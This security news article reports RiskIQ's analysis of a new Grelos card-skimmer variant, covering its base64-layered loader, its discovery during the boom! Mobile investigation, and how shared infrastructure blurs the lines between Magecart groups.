A new version of Grelos, a malware associated with Magecart card skimming campaigns, has demonstrated how intricacies and overlaps in infrastructure could create a "murkiness," which makes it harder for security researchers to track separate Magecart groups.
The Grelos skimmer appeared on the threat landscape in 2015 and was previously linked to Magecart Group 1-2, however, this skimmer was also observed in attacks by other threat actors. The latest Grelos version detailed by RiskIQ contains "a rehash" of the original code first seen in 2015-16, consisting of a loader and a skimmer, "both of which are base64 encoded five times over."
The new skimmer variant was uncovered while investigating domains associated with a recent attack against boom! Mobile’s website, in which the Full(z) House group injected a skimmer in website to steal customer data. The domains used in this campaign led the team to a cookie and associated skimmer websites, including facebookapimanager[.]com and googleapimanager[.]com. However, a closer inspection revealed samples of a recent variant of the Grelos skimmer, not the Full(z) House malware.
"In several recent Magecart compromises, we have seen increasing overlaps in infrastructure used to host various skimmers that are unrelated in terms of the techniques and code structures they employ," said RiskIQ. "We also observe new variants of skimmers reusing code seen over the last several years."
Different skimmer variants linked to Grelos have been "using the same infrastructure or other connections through WHOIS records and other malicious activities, such as phishing and malware during this investigation," the researchers said.